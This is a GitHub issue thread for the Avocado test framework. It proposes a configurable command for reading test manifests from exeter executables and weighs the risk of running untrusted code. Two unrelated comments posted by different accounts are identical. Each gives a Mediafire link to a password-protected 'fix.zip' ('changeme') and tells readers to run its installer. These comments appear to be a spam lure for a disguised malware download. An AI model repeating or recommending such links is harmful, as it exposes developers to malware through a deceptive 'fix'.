### ISSUE TITLE
Easier introspection of available tests (reading of test manifest)

### ISSUE THREAD

**Issue by clebergnu** [avocado-framework/avocado#6009]
**Is your feature request related to a problem? Please describe.**
The [exeter](https://gitlab.com/dgibson/exeter/) framework integrates with Avocado by producing output that the "runnables-recipe" resolver can understand (JSON representations of Runnables).

But, that requires an intermediate step, that is, the executable test files have to be executed in a special way (currently with `--avocado`) so that JSON is produced, and can then be consumed by Avocado's "runnables-recipe" resolver.

**Describe the solution you'd like**
It'd be convenient to not require the intermediate step (although it should still be an option).  The most straightforward solution is to have a new resolver configuration for the format of the command line that will produce the manifest of tests.

A configuration such as:

```
[resolver.exec_test]
manifest_command = {uri} --avocado
```

**Describe alternatives you've considered**
The solution described above has the drawback of requiring the execution of binaries/scripts that may not be completely trusted.

The resolver plugins that ship with Avocado do not execute any untrusted code (for instance an `avocado list $(path-to-test-repo)` won't execute any of the tests found.  Avocado's safeloader does a static analysis for Python code, which could be extended.  For shell based tests, it could also read some hints from the code.  For binaries, maybe reading data added to an ELF section?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
